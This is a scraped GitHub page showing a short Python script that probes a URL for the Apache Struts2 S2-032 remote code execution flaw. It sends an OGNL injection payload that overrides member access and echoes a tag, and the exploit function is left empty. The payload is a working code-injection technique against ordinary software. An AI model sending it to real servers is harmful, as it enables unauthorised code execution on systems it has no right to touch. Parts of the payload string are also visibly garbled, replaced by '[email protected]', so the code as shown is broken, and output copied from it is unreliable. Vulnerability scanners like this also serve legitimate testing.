-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy paths2-032.py
56 lines (41 loc) · 1.14 KB
/
s2-032.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
import getopt
import sys
import time
DEBUG=False
def check(url):
global DEBUG
now = time.strftime('%H:%M:%S',time.localtime(time.time()))
print("["+str(now)+"] [INFO] Checking Struts2 (S2-032) Remote Code Execution...")
tag='S2-032'
print("Check URL : "+url)
payload = {'method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse().getWriter(),#writer.println(#parameters.tag[0]),#writer.flush(),#writer.close': '', 'tag': tag}
r = requests.get(url, params=payload)
if DEBUG:
print("Content:\n"+r.text)
if tag in r.text:
if DEBUG:
print("[+] vuls found with payload: %s"%r.url)
else:
print("[+] vuls found!!")
return True
else:
print('[!] no vuls! url: %s'%url)
return False
def exp():
pass
def main():
global DEBUG
try:
options,args = getopt.getopt(sys.argv[1:],"u:v")
except getopt.GetoptError:
print("[WARNING] error, to see help message of options run with '-h'")
sys.exit()
if ('-v', '') in options:
DEBUG=True
for name,value in options:
if name in ("-u"):
check(value)
return
if __name__ == '__main__':
main()